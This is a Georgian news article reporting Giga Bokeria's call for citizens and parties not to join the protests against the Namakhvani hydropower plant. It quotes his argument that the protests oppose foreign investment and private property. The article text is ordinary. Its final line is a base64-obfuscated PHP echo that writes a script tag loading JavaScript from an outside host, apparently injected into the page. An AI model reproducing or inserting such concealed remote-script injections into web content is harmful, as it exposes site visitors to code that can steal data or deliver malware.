celsiusi
ავერსი საქკაბელი

"ევროპული საქართველოს" ლიდერი გიგა ბოკერია მოქალაქეებს, პოლიტიკურ პარტიებს და სამოქალაქო ჯგუფებს მოუწოდებს, რომ "ნამახვანჰესის" საწინააღმდეგო აქციებს არ შეუერთდნენ. 

 
ბოკერიას თქმით, "ნამახვანის" პროტესტის გზავნილი უცხოური ინვესტიციების წინააღმდეგ მიმართული კამპანიაა და ეს ყველაფერი არც პრაგმატულად და არც მორალურად კარგ შედეგს არ მოიტანს.  
 
"ეს არის ბრძოლა და კამპანია უცხოური ინვესტიციების წინააღმდეგ, მიუღებლობის და სიძულვილის კამპანია უმრავლესობისგან განსხვავებული ადამიანის წინააღმდეგ და მეორე მხრივ, კამპანია კერძო საკუთრების და თავისუფალი ეკონომიკის წინააღმდეგ. არა კამპანია მთავრობის კორუფციის ან ზოგადად, მთავრობის წინააღმდეგ. მე მინდა მოვუწოდო ყველა გულწრფელ მოქალაქეს, რომელიც ამ მთავრობაზე საფუძვლიანად არის გაბრაზებული, არ შეუერთდეს ამ პროტესტს. მინდა მოვუწოდო ყველა პოლიტიკურ პარტიას და სამოქალაქო ჯგუფს, არ აყვნენ ცდუნებას, რომ ხალხი გაბრაზებულია ეს არის შესაძლებლობა მთავრობის წინააღმდეგ ამის გამოყენების. ეს არ მოიტანს არც პრაგმატულად და არც მორალურად კარგ შედეგს", -აცხადებს ბოკერია. 
 
შეგახსენებთ, რომ "რიონის ხეობის მცველები" უკვე მესამე დღეა, ჰესის მშენებლობის წინააღმდეგ პროტესტს თბილისში აგრძელებენ. 
1624
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");